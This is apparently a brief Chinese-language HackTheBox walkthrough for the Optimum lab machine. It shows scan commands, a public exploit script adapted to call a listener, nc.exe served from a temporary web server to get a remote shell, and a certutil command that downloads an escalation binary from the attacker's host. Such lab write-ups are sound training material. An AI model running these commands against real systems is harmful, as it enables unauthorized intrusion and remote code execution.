{{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.
HackTheBox >_ Optimum_8
Published on 24 Nov 2020
Optimum_8
rustscan 10.10.10.8 -b 924 -t 1500 --no-nmap
nmap -sC -sV -Pn -p80 10.10.10.8
39161.py 将本地地址端口修改为监听端口
在工作目录准备nc,并建立80端口临时http服务。
cp /usr/share/windows-resources/binaries/nc.exe .
sudo php -S 0.0.0.0:80
执行漏洞利用脚本
python 39161.py 10.10.10.8 80
http服务会显示靶机下载nc的过程
在监听处获得shell并得到user
certutil -urlcache -split -f http://10.10.14.30/41020.exe
